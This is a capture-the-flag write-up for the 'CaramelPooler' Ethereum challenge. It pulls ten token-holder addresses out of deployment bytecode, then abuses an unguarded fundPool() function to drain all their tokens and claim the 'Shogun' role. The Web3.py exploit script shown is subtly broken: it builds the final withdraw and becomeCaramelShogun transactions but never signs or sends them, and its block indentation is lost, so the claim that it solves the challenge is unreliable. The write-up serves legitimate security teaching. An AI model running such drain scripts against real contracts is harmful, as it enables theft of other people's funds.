Tags: ethereum blockchain smartcontract
Rating:
# Challenge: **CaramelPooler**
Description:
> Tokugawa shogunate cheated for a living. For that reason, you have to become shogun instead. Do it for Hideyoshi!
> nc challs.xmas.htsp.ro 8016
> http://challs.xmas.htsp.ro:8017/
> [Source](https://github.com/joswha/ethxmasctf2021/tree/main/caramelpool/contracts)
## Analizing Given Files:
At first we need to understand what the provided contracts make:
- **[Setup.sol](https://github.com/TowerofHanoi/towerofhanoi.github.io/tree/master/writeups_files/XMAS-CTF/CaramelPooler/Setup.sol)** creates a new caramelPool contract passing it 10 ethereum addresses and also contain a [isSolved()](https://github.com/TowerofHanoi/towerofhanoi.github.io/tree/master/writeups_files/XMAS-CTF/CaramelPooler/Setup.sol#L30-L32) function that checks if a variable in CaramelPool is different from an address. Setup.isSolved() returning a True value means we solve the challenge.
- **[CaramelPool.sol](https://github.com/TowerofHanoi/towerofhanoi.github.io/tree/master/writeups_files/XMAS-CTF/CaramelPooler/CaramelPool.sol)** creates a certain number of tokens (total supply equal to 180000000) divided equally between ten addresses (the ten address provided during Setup.sol creation). The contract permits to tranfer those tokens between addresses (with the function [CaramelPool.transfer(fromAddress, toAddress)](https://github.com/TowerofHanoi/towerofhanoi.github.io/tree/master/writeups_files/XMAS-CTF/CaramelPooler/CaramelPool.sol#L33-42)), to fund the pool and then withdraw (with the functions [CaramelPool.fundPool(fromAddress)](https://github.com/TowerofHanoi/towerofhanoi.github.io/tree/master/writeups_files/XMAS-CTF/CaramelPooler/CaramelPool.sol#L44-50) and [CaramelPool.withdrawFromPool()](https://github.com/TowerofHanoi/towerofhanoi.github.io/tree/master/writeups_files/XMAS-CTF/CaramelPooler/CaramelPool.sol#L52-58)). There's also a function to check the token balance of an address (CaramelPool.balanceOf(address)) and the **[becomeCaramelShogun()](https://github.com/TowerofHanoi/towerofhanoi.github.io/tree/master/writeups_files/XMAS-CTF/CaramelPooler/CaramelPool.sol#L60-L64)** function, which checks if the balance of an address is equal to the total supply and, if so, turns that address into the **Shogun**. If the sender address is the Shogun, Setup.isSolved() returns true and the callenge is solved.
Even if it is not of useful to the solution, the CaramelPool.sol also contains the private function isContract(address) which checks if an address is a contract for duration. Just for more information, the method by which it is checked whether an address is a contract or no, is easily bypassable with [this](https://solidity-by-example.org/hacks/contract-size/) solution.
To obtain these contracts and the blockchain used for the challenge, it is necessary to: `nc challs.xmas.htsp.ro 8016`. With this command it is possible, after selecting _launch new instance_ and solving a short pow with [hashcash](https://it.wikipedia.org/wiki/Hashcash), to obtain: an RPC endpoint, the address of the Setup.sol contract, a private key and a uuid (useful for obtaining the flag at the end of the challenge).
## Strategy
As you can understand from the analysis of the two contracts, all we have to do is **transfer the tokens** from the 10 addresses declared in Setup.sol to the sender address with the function CaramelPool.fundPool() and CaramelPool.withdrawFromPool().
The problem lies in **finding these 10 addresses**.
All data on the blockchain, due to its use as a publicly distributed ledger, is public and therefore visible to anyone.
To retrieve all the data used by a particular contract when it was created and deployed, it is necessary to **find the block and the transaction** that generated it. From the input of the transaction it is possible to find out (in the form of bytecode) the data of the contract.
## Retrieving the transaction data
Fortunately for every blockchain instance of the challenge, the last block is the one in which the contracts were created. To retreive the transaction data in this contract is possible to create a python script using the **[Web3.py](https://web3py.readthedocs.io/en/stable/) Python library**.
This library allows to interact with the Ethereum (and similar) blockchain. Here's a [quick reference](https://web3py.readthedocs.io/en/stable/quickstart.html) about how to install and use it.
The python script must:
1. connect with the given RPC endpoint
2. ask a node for the last block (which only contains the transaction of the generation of the challenge contracts)
3. access the transaction present in the last block
4. print the **input of the transaction**
Here's the code:
```python
from web3 import Web3
url = "INSERT_HERE_THE_RPC_ENDPOINT_URL_GIVEN"
provider = Web3(Web3.HTTPProvider(url))
blockNumber = provider.eth.block_number
lastBlock = provider.eth.get_block(blockNumber)
lastTransaction = provider.eth.get_transaction(str(((lastBlock.transactions)[0]).hex()))
print("Last transaction input: ", lastTransaction.input)
```
The code output is the following **bytecode**:
```
0x608060405234801561001057600080fd5b506000600a67ffffffffffffffff811115610054577f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6040519080825280602002602001820160405280156100825781602001602082028036833780820191505090505b509050730136439830e1abe0296b764691eb3fc296d145bf816000815181106100d4577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073122e53f0444ac267371a0cf63d15cd782d8bb1c68160018151811061015d577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506f219ab540356cbb839cbe05303d7705fa816002815181106101e2577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050734452552736041bcc3fe0f35647e56f2c4fdf956e8160038151811061026b577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507201e0515bc0b5c2df1abc2842b42b29994f44d0816004815181106102f3577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507397eebf4908c5c08eb09196579fc6451585d1b9a68160058151811061037c577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050731352cb6ccec784dd765ac55f0413cadfa4946cfd81600681518110610405577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507314db6558f0dfcd940dae566c20f694d2f0454ca88160078151811061048e577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507313182312eed5a75d62e45b726b63639b6a8f25bc81600881518110610517577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050731337cee91653179667c33affdbc28264c50c40b0816009815181106105a0577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050806040516105e790610653565b6105f191906106e5565b604051809103906000f08015801561060d573d6000803e3d6000fd5b506000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050610772565b610f6c80610a3283390190565b600061066c8383610678565b60208301905092915050565b61068181610740565b82525050565b600061069282610717565b61069c818561072f565b93506106a783610707565b8060005b838110156106d85781516106bf8882610660565b97506106ca83610722565b9250506001810190506106ab565b5085935050505092915050565b600060208201905081810360008301526106ff8184610687565b905092915050565b6000819050602082019050919050565b600081519050919050565b6000602082019050919050565b600082825260208201905092915050565b600061074b82610752565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6102b1806107816000396000f3fe608060405234801561001057600080fd5b50600436106100365760003560e01c806364d98f6e1461003b578063dd62930314610059575b600080fd5b610043610077565b60405161005091906101cc565b60405180910390f35b61006161014c565b60405161006e91906101e7565b60405180910390f35b6000601373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16634deb82256040518163ffffffff1660e01b815260040160206040518083038186803b1580156100f757600080fd5b505afa15801561010b573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061012f9190610185565b73ffffffffffffffffffffffffffffffffffffffff161415905090565b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60008151905061017f81610264565b92915050565b60006020828403121561019757600080fd5b60006101a584828501610170565b91505092915050565b6101b781610214565b82525050565b6101c681610240565b82525050565b60006020820190506101e160008301846101ae565b92915050565b60006020820190506101fc60008301846101bd565b92915050565b600061020d82610220565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061024b82610252565b9050919050565b600061025d82610220565b9050919050565b61026d81610202565b811461027857600080fd5b5056fea264697066735822122032de8043eb101f00939d6e6153b5efe66761756956858822513c652ab115209464736f6c63430008000033608060405260006001556012600260006101000a81548160ff021916908360ff160217905550600260009054906101000a900460ff1660ff16600a62000046919062000314565b620f424062000056919062000314565b6003556013600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550348015620000a857600080fd5b5060405162000f6c38038062000f6c8339818101604052810190620000ce91906200026c565b60005b8151811015620001ab576000600260009054906101000a900460ff1660ff16600a620000fe919062000314565b620186a06200010e919062000314565b9050806000808585815181106200014e577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550508080620001a290620003b3565b915050620000d1565b505062000479565b6000620001ca620001c484620002e5565b620002b1565b90508083825260208201905082856020860282011115620001ea57600080fd5b60005b858110156200021e578162000203888262000228565b845260208401935060208301925050600181019050620001ed565b5050509392505050565b60008151905062000239816200045f565b92915050565b600082601f8301126200025157600080fd5b815162000263848260208601620001b3565b91505092915050565b6000602082840312156200027f57600080fd5b600082015167ffffffffffffffff8111156200029a57600080fd5b620002a8848285016200023f565b91505092915050565b6000604051905081810181811067ffffffffffffffff82111715620002db57620002da62000430565b5b8060405250919050565b600067ffffffffffffffff82111562000303576200030262000430565b5b602082029050602081019050919050565b60006200032182620003a9565b91506200032e83620003a9565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156200036a576200036962000401565b5b828202905092915050565b6000620003828262000389565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b6000620003c082620003a9565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff821415620003f657620003f562000401565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6200046a8162000375565b81146200047657600080fd5b50565b610ae380620004896000396000f3fe608060405234801561001057600080fd5b50600436106100935760003560e01c80634deb8225116100665780634deb8225146100fa578063534844a2146101185780635b8ff0cf1461013657806370a0823114610140578063ba45b0b81461017057610093565b806318160ddd1461009857806326c0e5c5146100b6578063313ce567146100c05780633d61e543146100de575b600080fd5b6100a061018c565b6040516100ad9190610981565b60405180910390f35b6100be610192565b005b6100c8610271565b6040516100d5919061099c565b60405180910390f35b6100f860048036038101906100f3919061066e565b610284565b005b610102610371565b60405161010f91906108a6565b60405180910390f35b610120610397565b60405161012d9190610981565b60405180910390f35b61013e61039d565b005b61015a6004803603810190610155919061066e565b610463565b6040516101679190610981565b60405180910390f35b61018a60048036038101906101859190610697565b61047b565b005b60035481565b61019b33610646565b156101db576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016101d290610921565b60405180910390fd5b6003546001541115610222576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161021990610961565b60405180910390fd5b6001546000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000600181905550565b600260009054906101000a900460ff1681565b61028d33610646565b156102cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016102c490610901565b60405180910390fd5b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060008060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550806001600082825461036691906109c8565b925050819055505050565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60015481565b6003546000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541015610420576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610417906108c1565b60405180910390fd5b33600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006020528060005260406000206000915090505481565b8073ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614156104ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104e190610941565b60405180910390fd5b8173ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610558576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161054f906108e1565b60405180910390fd5b60008060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050600081116105a857600080fd5b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461063a91906109c8565b92505081905550505050565b600080823b905060008111915050919050565b60008135905061066881610a96565b92915050565b60006020828403121561068057600080fd5b600061068e84828501610659565b91505092915050565b600080604083850312156106aa57600080fd5b60006106b885828601610659565b92505060206106c985828601610659565b9150509250929050565b6106dc81610a1e565b82525050565b60006106ef6039836109b7565b91507f596f7520646f6e2774206861766520656e6f75676820746f6b656e7320746f2060008301527f6265636f6d652074686520436172616d656c2053686f67756e000000000000006020830152604082019050919050565b6000610755601c836109b7565b91507f43616e206f6e6c792073656e642066726f6d20796f757273656c6621000000006000830152602082019050919050565b60006107956015836109b7565b91507f4e6f20636f6e74726163747a20616c6c6f7765642e00000000000000000000006000830152602082019050919050565b60006107d56020836109b7565b91507f596f752063616e27742077697468647261772066726f6d2074686520706f6f6c6000830152602082019050919050565b60006108156018836109b7565b91507f43616e6e6f742073656e6420746f20796f757273656c662100000000000000006000830152602082019050919050565b6000610855601a836109b7565b91507f446f6e27742074727920746f206861636b2074686520706f6f6c0000000000006000830152602082019050919050565b61089181610a50565b82525050565b6108a081610a5a565b82525050565b60006020820190506108bb60008301846106d3565b92915050565b600060208201905081810360008301526108da816106e2565b9050919050565b600060208201905081810360008301526108fa81610748565b9050919050565b6000602082019050818103600083015261091a81610788565b9050919050565b6000602082019050818103600083015261093a816107c8565b9050919050565b6000602082019050818103600083015261095a81610808565b9050919050565b6000602082019050818103600083015261097a81610848565b9050919050565b60006020820190506109966000830184610888565b92915050565b60006020820190506109b16000830184610897565b92915050565b600082825260208201905092915050565b60006109d382610a50565b91506109de83610a50565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115610a1357610a12610a67565b5b828201905092915050565b6000610a2982610a30565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b610a9f81610a1e565b8114610aaa57600080fd5b5056fea264697066735822122074a092343e8d285c00cad1183aac813d54f28f902c2db35ed148fe5b7d4d119364736f6c63430008000033
```
## Analyze Bytecode
To retrieve the 10 addresses used by the setup.sol contract all we need to do is analyze the bytecode.
For the analysis process we can get help from some tools like the _[pyevmasm](https://github.com/crytic/pyevmasm)_ library, with the useful `evmasm` command that permits to assemble or disassemble the Ethereum Virtual Machine bytecode.
The addresses with the token are some of the correct addresses subject to a push operation (if an address is subject to a push 16 or 20 it should be padded with zeros). This work could also be done with some online disassembler like _[this](https://etherscan.io/opcode-tool)_ or more simply by noting that the bytecode has a _repetitive pattern_ that isolates the 10 desired addresses:
```
0x608060405234801561001057600080fd5b506000600a67ffffffffffffffff811115610054577f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6040519080825280602002602001820160405280156100825781602001602082028036833780820191505090505b50905073
-> 0136439830e1abe0296b764691eb3fc296d145bf
816000815181106100d4577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
-> 122e53f0444ac267371a0cf63d15cd782d8bb1c6
8160018151811061015d577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506f
-> 219ab540356cbb839cbe05303d7705fa #Address to be padded with zeros
816002815181106101e2577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
-> 4452552736041bcc3fe0f35647e56f2c4fdf956e
8160038151811061026b577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505072
-> 01e0515bc0b5c2df1abc2842b42b29994f44d0 #Address to be padded with zeros
816004815181106102f3577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
-> 97eebf4908c5c08eb09196579fc6451585d1b9a6
8160058151811061037c577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
-> 1352cb6ccec784dd765ac55f0413cadfa4946cfd
81600681518110610405577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
-> 14db6558f0dfcd940dae566c20f694d2f0454ca8
8160078151811061048e577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
-> 13182312eed5a75d62e45b726b63639b6a8f25bc
81600881518110610517577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
-> 1337cee91653179667c33affdbc28264c50c40b0
816009815181106105a0577f4e487b710000000000000000000000000000000000000000000000000000000060005260...
```
So the **ten addresses** are:
1. _0x0136439830e1abe0296b764691eb3fc296d145bf_
2. _0x122e53f0444ac267371a0cf63d15cd782d8bb1c6_
3. _0x00000000219ab540356cbb839cbe05303d7705fa_
4. _0x4452552736041bcc3fe0f35647e56f2c4fdf956e_
5. _0x0001e0515bc0b5c2df1abc2842b42b29994f44d0_
6. _0x97eebf4908c5c08eb09196579fc6451585d1b9a6_
7. _0x1352cb6ccec784dd765ac55f0413cadfa4946cfd_
8. _0x14db6558f0dfcd940dae566c20f694d2f0454ca8_
9. _0x13182312eed5a75d62e45b726b63639b6a8f25bc_
10. _0x1337cee91653179667c33affdbc28264c50c40b0_
## Interacting with the contract and becoming Shōgun
After finding the ten addresses containing the desired tokens, it is necessary to interact with the CaramelPool.sol contract and arriving at a balance equal to the total token supply.
To interact with the blockchain we could both use the **Web3.py** python library or a web-based Solidity online IDE, **[Remix](http://remix.ethereum.org/)**.
With **Remix IDE** at first we have to upload the two contracts given in the _File Explorers_ tab and compile them with the correct version of Solidity (in this case the 0.8.0) in the _Solidity Compiler_ tab.
Then we load the contracts in the _Deploy & Run Transactions_ tab by connecting to the rpc endpoint given (switch the _Environment_ to _Web3 Provider_ giving the rpc endpoint link) and pasting the setup address in the _Load contract from Address_ field.
After this by clicking the _At Address_ button we load the Setup.sol and then by calling the Setup.carmelPool() function (clicking the _caramelPool_ button in the _Deployed Contracts_ section) we can get the CaramelPool.sol address.
After loading CaramelPool.sol contract and calling the _CaramelPool.fundPool(fromAddress)_ function with the ten address found as a parameter we can have a withdram amount in the contract pool equal to the total supply. Then by calling the _CaramelPool.withdrawFromPool()_ function and _CaramelPool.becomeCaramelShogun()_ we can become the Shogun so if we call the _Setup.isSolved()_ function we get a true value.
With **[Web3.py](https://web3py.readthedocs.io/en/stable/)** Python library. All we have to do is to know a private key account, the rpc endpoint link, the Setup.sol contract address and the ABI of the two contracts.
```python
from web3 import Web3
import json
url = "INSERT_HERE_THE_RPC_ENDPOINT_URL_GIVEN"
provider = Web3(Web3.HTTPProvider(url))
privateKey = 'INSERT_HERE_THE_PRIVATE_KEY_GIVEN'
nonce = 0
with open("setup.json") as f: #json file with the contract ABI
setup_json = json.load(f)
with open("caramel.json") as f: #json file with the contract ABI
caramel_json = json.load(f)
setupContract = Web3.toChecksumAddress('INSERT_HERE_THE_SETUP_CONTRACT_ADDRESS_GIVEN')
setup = provider.eth.contract(address=setupContract, abi = setup_json)
caramelContract = Web3.toChecksumAddress(setup.functions.caramelPool().call())
caramel = provider.eth.contract(address=caramelContract, abi = caramel_json)
addressesToken = [ '0x0136439830e1abe0296b764691eb3fc296d145bf',
'0x122e53f0444ac267371a0cf63d15cd782d8bb1c6',
'0x00000000219ab540356cbb839cbe05303d7705fa',
'0x4452552736041bcc3fe0f35647e56f2c4fdf956e',
'0x0001e0515bc0b5c2df1abc2842b42b29994f44d0',
'0x97eebf4908c5c08eb09196579fc6451585d1b9a6',
'0x1352cb6ccec784dd765ac55f0413cadfa4946cfd',
'0x14db6558f0dfcd940dae566c20f694d2f0454ca8',
'0x13182312eed5a75d62e45b726b63639b6a8f25bc',
'0x1337cee91653179667c33affdbc28264c50c40b0']
for addressTarget in addressesToken:
transaction = caramel.functions.fundPool(Web3.toChecksumAddress(addressTarget)).buildTransaction({
'gas': 70000,
'gasPrice': Web3.toWei(40, 'gwei'),
'nonce': nonce})
signed_txn = provider.eth.account.signTransaction(transaction, private_key=privateKey)
provider.eth.sendRawTransaction(signed_txn.rawTransaction)
nonce += 1
transaction = caramel.functions.withdrawFromPool().buildTransaction({
'gas': 70000,
'gasPrice': Web3.toWei(40, 'gwei'),
'nonce': nonce
}) #Withdraw all the token to the sender address
nonce += 1
transaction = caramel.functions.becomeCaramelShogun().buildTransaction({
'gas': 70000,
'gasPrice': Web3.toWei(40, 'gwei'),
'nonce': nonce
}) #Now the sender address is the caramel Shogun
print(setup.functions.isSolved().call())
```
## Retrieving the flag
After the _Setup.isSolved()_ function returned a _True_ value we can get the flag by connect to the challenge server with `nc challs.xmas.htsp.ro 8016`, selecting _get flag_ and inserting the uuid given at the beginning of the challenge.
Turns out that the flag was:
`X-MAS{G00d_j0b_y0u_4r3_Hideyoshis_h31r}`
